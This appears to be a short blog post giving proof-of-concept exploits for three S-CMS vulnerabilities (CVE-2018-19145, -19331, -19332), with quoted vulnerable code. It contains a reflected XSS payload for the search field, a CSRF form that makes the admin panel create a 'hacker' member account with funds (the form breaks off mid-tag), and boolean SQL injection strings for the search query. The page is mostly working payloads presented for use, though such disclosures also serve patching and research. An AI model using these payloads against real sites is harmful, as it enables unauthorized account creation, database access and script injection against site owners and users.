The POC of S-CMS(Xss) -CVE-2018-19145

Download page:
https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip

location: S-CMS/search.php line144

Vulnerable code: <input type="text" name="keyword" class="form-control" placeholder="<?php echo lang("输入关键词/l/Input your Keywords")?>" value="<?php echo $keyword?>">

Exp: "><script>(1)</script>

Comments

The POC of S-CMS(CSRF)-CVE-2018-19332

Download page: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip CSRF Exp: <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html" charset="utf-8" /> </head> <body> <center><h1>fake request</center> <div> <form action="http://127.0.0.1/S-CMS/admin/ajax.php?type=member&action=add&lang=0" name="form" method="post" role="form"> <input type="hidden" name="M_login" value="hacker"> <input type="hidden" name="M_pwd" value="hacker"> <input type="hidden" name="M_money" value="10000"> <input type="hidden" name="M_fen" value="0"> <input type="hidden" name="M_name" value="1"> <inpu

The POC of S-CMS(sql-injection)-CVE-2018-19331

Download page: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/2.mall.php.zip location: S-CMS/search.php line 155 Vulnerable code: $sql="select * from SL_text where (T_title like '%". $keyword ."%' or T_content like '%". $keyword ."%' ) order by T_id desc"; Exp: %' AND 1=1 AND '%'=' %' AND 1=2 AND '%'=' Attacker can add sql statement in the between of both "and" to query the database.

kingflyme's blog

Search This Blog